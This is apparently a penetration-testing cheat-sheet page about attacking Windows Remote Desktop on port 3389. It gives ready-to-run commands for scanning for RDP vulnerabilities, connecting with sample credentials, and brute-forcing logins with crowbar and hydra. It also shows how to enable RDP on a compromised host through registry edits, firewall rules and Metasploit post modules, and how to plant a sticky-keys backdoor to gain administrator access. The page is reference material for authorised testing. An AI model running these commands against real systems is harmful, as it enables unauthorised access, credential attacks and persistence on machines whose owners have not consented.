Port 3389 - RDP

RDP Pentesting

Nmap

nmap --script "rdp-enum-encryption or rdp-vuln-ms12-020 or rdp-ntlm-info" -p 3389 -T4 $RHOST

Connection

# Workgroup machine
xfreerdp /u:ariah /v:$RHOST +clipboard
rdesktop -u ariah -p NowiseSloopTheory $RHOST

# Domain joined machine
xfreerdp /u:CORP\\iptracej /v:192.168.128.10 +clipboard
rdesktop -d corp -u iptracej 192.168.128.10

Brute force

# https://github.com/galkan/crowbar
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'

# hydra
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp

Enable RDP

# Method 1

CMD> netsh firewall set service RemoteDesktop enable
CMD> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
CMD> reg add "hklm\system\currentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
CMD> sc config TermService start= auto
CMD> net start Termservice
CMD> netsh.exe

CMD> add portopening TCP 3389 "Remote Desktop"

# Method2

netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (TCP-In)" dir=in action=allow 
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the Remote Desktop service to allow RDP traffic. [TCP 3389] added by LogicDaemon's script" enable=yes 
profile=private,domain localport=3389 protocol=tcp

netsh.exe advfirewall firewall add rule name="Remote Desktop - User Mode (UDP-In)" dir=in action=allow 
program="%%SystemRoot%%\system32\svchost.exe" service="TermService" description="Inbound rule for the 
Remote Desktop service to allow RDP traffic. [UDP 3389] added by LogicDaemon's script" enable=yes 
profile=private,domain localport=3389 protocol=udp

# Method3

msf6> run post/windows/manage/enable_rdp
msf6> set username iptracej
msf6> set password iptracej
msf6> set session 1
msf6> exploit 
# https://www.offensive-security.com/metasploit-unleashed/enabling-remote-desktop/ 
meterpreter> run getgui -e -u iptracej -p iptracej

# Sticky key to elevate to Administrative Privilege
# https://www.hackingarticles.in/remote-desktop-penetration-testing-port-3389/
msf6> use post/windows/manage/sticky_keys
msf6> set session 1
msf6> exploit

PreviousPort 6379 - Redis NextPort 5985,5986 - WinRM

Last updated 2 years ago